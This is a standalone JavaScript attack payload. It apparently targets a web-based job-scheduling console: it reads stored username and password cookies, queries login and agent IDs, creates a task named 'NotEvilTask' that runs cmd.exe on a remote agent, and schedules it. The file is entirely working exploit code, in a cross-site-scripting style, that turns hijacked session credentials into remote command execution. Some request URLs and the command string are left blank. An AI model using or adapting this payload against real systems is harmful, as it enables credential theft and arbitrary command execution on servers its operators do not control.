console.log('Starting Payload..'); var d = new Date(); userCookie = 'CurUserName'; pwdCookie= 'CurPassword'; var ca = document.cookie.split(';'); function readCookie(name) { var nameEQ = name + '='; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function makeid(length) { var result = ''; var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; var charactersLength = characters.length; for ( var i = 0; i < length; i++ ) { result += characters.charAt(Math.floor(Math.random() * charactersLength)); } return result; } var delay = ( function() { var timer = 0; return function(callback, ms) { clearTimeout (timer); timer = setTimeout(callback, ms); }; })(); username = decodeURIComponent(readCookie(userCookie)); passwd = readCookie(pwdCookie); console.log(username + '/' + passwd); // Get OS Login UID console.log('[+] Grabbing Login IDs'); var req = new XMLHttpRequest(); req.open('', '', false); req.setRequestHeader('Accept', '*/*'); req.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'); req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5'); req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12)); req.setRequestHeader('Content-Type', 'application/json'); req.setRequestHeader('login', username); req.setRequestHeader('password', passwd); req.send(); var responseData = JSON.parse(req.responseText); var loginName = responseData.items[0].name; var loginUID = responseData.items[0].uid; // Grab OS Login UID console.log('[+] OS Login UID Found: ' + loginUID); // Get Agent UID console.log('[+] Grabbing Agent IDs'); var req = new XMLHttpRequest(); req.open('', '', false); req.setRequestHeader('Accept', '*/*'); req.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'); req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5'); req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12)); req.setRequestHeader('Content-Type', 'application/json'); req.setRequestHeader('login', username); req.setRequestHeader('password', passwd); req.send(); var responseData = JSON.parse(req.responseText); var agentName = responseData.items[0].name; var agentUID = responseData.items[0].uid; // Grab OS Login UID console.log('[+] Agent UID and Name Found: ' + loginUID + ' ' + agentName); // Create Task Definition console.log('[+] Executing Task Creation'); var response = ''; var cmd = ''; var req = new XMLHttpRequest(); req.open('', '', false); req.setRequestHeader('Accept', '*/*'); req.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'); req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5'); req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12)); req.setRequestHeader('Content-Type', 'application/json'); req.setRequestHeader('login', username); req.setRequestHeader('password', passwd); req.send('{"id":0,"name":"NotEvilTask","uid":"' + makeid(12) + '","enabled":true,"description":"","type":"TASK","subType":"TASK_SYSCMD","agent":{"type":"REMOTE","id":1,"name":"' + agentName + '","uid":"' + agentUID + '"},"attributes":{"exitCodes":"0","isCommandScript":false,"command":"cmd.exe","parameters":"' + cmd + '","startDir":"C:/windows/system32","loadProfile":true},"folder":{"id":2,"name":"Definitions"},"simulate":{"simulateTaskRun":false,"duration":0},"login":{"name":"' + loginName + '","uid":"' + loginUID + '","id":12},"output":{"return":false,"interleave":false,"accumulate":false,"readFromFile":false,"filename":"","format":"","amountType":"","amount":0,"xslStyleSheet":"","stdoutToFile":false,"stdoutAppend":false,"stdoutFilename":"","stderrToFile":false,"stderrAppend":false,"stderrFilename":""},"variables":[],"resources":[],"actions":[]}'); console.log('[+] Success'); var responseData = JSON.parse(req.responseText); console.log('Data: ' + JSON.stringify(responseData,null,2)); var taskID = responseData.definition.id; // Grab gen ID console.log('[+] Grabbed ID: ' + taskID); // Execute Task console.log('[+] Executing Task'); var req = new XMLHttpRequest(); req.open('', '' + '/oc_main/zenaweb/definitions/' + taskID + '/operation?operation=schedule', false); req.setRequestHeader('Accept', '*/*'); req.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'); req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5'); req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12)); req.setRequestHeader('Content-Type', 'application/json'); req.setRequestHeader('login', username); req.setRequestHeader('password', passwd); delay(function(){ req.send('{"schedDate":"' + '2022' + '.' + ('0' + (d.getMonth() + 1)).slice(-2) + '.' + ('0' + d.getDate()).slice(-2) + '","schedTime":"' + '01' + '.' + '01' + '.' + '01' + '","startOnHold":false,"perpetual":false,"skipTriggers":null}'); }, 3000 ); // end delay var responseData = JSON.parse(req.responseText); console.log('Data: ' + JSON.stringify(responseData,null,2)); console.log('[+] Task Executed Successfully');